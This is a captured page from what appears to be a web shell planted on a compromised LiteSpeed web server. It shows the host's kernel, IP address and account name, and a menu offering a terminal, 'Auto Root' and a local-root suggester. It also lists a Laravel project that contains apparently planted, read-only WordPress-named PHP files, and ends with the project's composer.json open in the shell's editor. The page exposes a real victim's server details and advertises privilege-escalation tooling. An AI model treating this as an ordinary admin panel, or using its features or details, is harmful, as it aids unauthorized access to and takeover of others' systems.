Linux spg1.cloudpowerdns.com 5.14.0-611.34.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 18 05:51:10 EST 2026 x86_64
LiteSpeed
Server IP : 176.9.63.151 & Your IP : 216.73.217.60
Domains :
Cant Read [ /etc/named.conf ]
User : fastear1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
fastear1 /
siba91 /
core /
Delete
Unzip
Name
Size
Permission
Date
Action
app
[ DIR ]
drwxr-xr-x
2023-11-03 02:38
bootstrap
[ DIR ]
drwxr-xr-x
2023-11-03 02:38
config
[ DIR ]
drwxr-xr-x
2023-11-03 02:38
cs2
[ DIR ]
drwxr-xr-x
2024-06-07 00:29
database
[ DIR ]
drwxr-xr-x
2023-11-03 02:38
img
[ DIR ]
drwxr-xr-x
2023-11-03 02:38
lang
[ DIR ]
drwxr-xr-x
2023-11-03 02:38
resources
[ DIR ]
drwxr-xr-x
2023-11-03 02:38
routes
[ DIR ]
drwxr-xr-x
2023-11-03 02:38
storage
[ DIR ]
drwxrwxr-x
2023-11-03 02:38
temp
[ DIR ]
drwxr-xr-x
2023-11-03 02:38
tests
[ DIR ]
drwxr-xr-x
2023-11-03 02:38
vendor
[ DIR ]
drwxr-xr-x
2023-11-03 02:38
.DS_Store
6
KB
-rw-r--r--
2023-11-03 02:38
.editorconfig
258
B
-rw-r--r--
2023-11-03 02:38
.env
0
B
-rw-r--r--
2023-11-03 02:38
.env.example
912
B
-rw-r--r--
2023-11-03 02:38
.gitattributes
152
B
-rw-r--r--
2023-11-03 02:38
.gitignore
207
B
-rw-r--r--
2023-11-03 02:38
.htaccess
197
B
-r--r--r--
2026-04-01 03:43
.styleci.yml
175
B
-rw-r--r--
2023-11-03 02:38
README.md
3.87
KB
-rw-r--r--
2023-11-03 02:38
artisan
1.65
KB
-rw-r--r--
2023-11-03 02:38
composer.json
2.44
KB
-rw-r--r--
2023-11-03 02:38
composer.lock
349.82
KB
-rw-r--r--
2023-11-03 02:38
package-lock.json
719.39
KB
-rw-r--r--
2023-11-03 02:38
package.json
643
B
-rw-r--r--
2023-11-03 02:38
phpunit.xml
1.15
KB
-rw-r--r--
2023-11-03 02:38
webpack.mix.js
556
B
-rw-r--r--
2023-11-03 02:38
wp-blog-header.php
2.74
KB
-r--r--r--
2026-04-01 03:43
wp-cron.php
2.74
KB
-rw-r--r--
2026-04-01 03:43
Save
Rename
{ "name": "laravel/laravel", "type": "project", "description": "The Laravel Framework.", "keywords": ["framework", "laravel"], "license": "MIT", "require": { "php": "^8.0.2", "coingate/coingate-php": "^3.0", "ezyang/htmlpurifier": "^4.13", "guzzlehttp/guzzle": "^7.2", "intervention/image": "^2.5", "laramin/utility": "dev-main", "laravel/framework": "^9.2", "laravel/sanctum": "^2.14.1", "laravel/tinker": "^2.7", "laravel/ui": "^3.4", "mailjet/mailjet-apiv3-php": "^1.4", "messagebird/php-rest-api": "^1.20", "mollie/laravel-mollie": "^2.14", "phpmailer/phpmailer": "^6.2", "razorpay/razorpay": "2.*", "sendgrid/sendgrid": "^7.6", "stripe/stripe-php": "^7.72", "textmagic/sdk": "dev-master", "twilio/sdk": "^6.23", "authorizenet/authorizenet": ">=1.9.3", "vonage/client": "^2.4" }, "require-dev": { "barryvdh/laravel-debugbar": "^3.3", "beyondcode/laravel-query-detector": "^1.5", "fakerphp/faker": "^1.9.1", "laravel/sail": "^1.0.1", "mockery/mockery": "^1.4.4", "nunomaduro/collision": "^6.1", "phpunit/phpunit": "^9.5.10", "spatie/laravel-ignition": "^1.0" }, "autoload": { "psr-4": { "App\\": "app/", "Database\\Factories\\": "database/factories/", "Database\\Seeders\\": "database/seeders/" }, "files": [ "app/Http/Helpers/helpers.php" ] }, "autoload-dev": { "psr-4": { "Tests\\": "tests/" } }, "scripts": { "post-autoload-dump": [ "Illuminate\\Foundation\\ComposerScripts::postAutoloadDump", "@php artisan package:discover --ansi" ], "post-update-cmd": [ "@php artisan vendor:publish --tag=laravel-assets --ansi --force" ], "post-root-package-install": [ "@php -r \"file_exists('.env') || copy('.env.example', '.env');\"" ], "post-create-project-cmd": [ "@php artisan key:generate --ansi" ] }, "extra": { "laravel": { "dont-discover": [] } }, "config": { "optimize-autoloader": true, "preferred-install": "dist", "sort-packages": true }, "minimum-stability": "dev", "prefer-stable": true }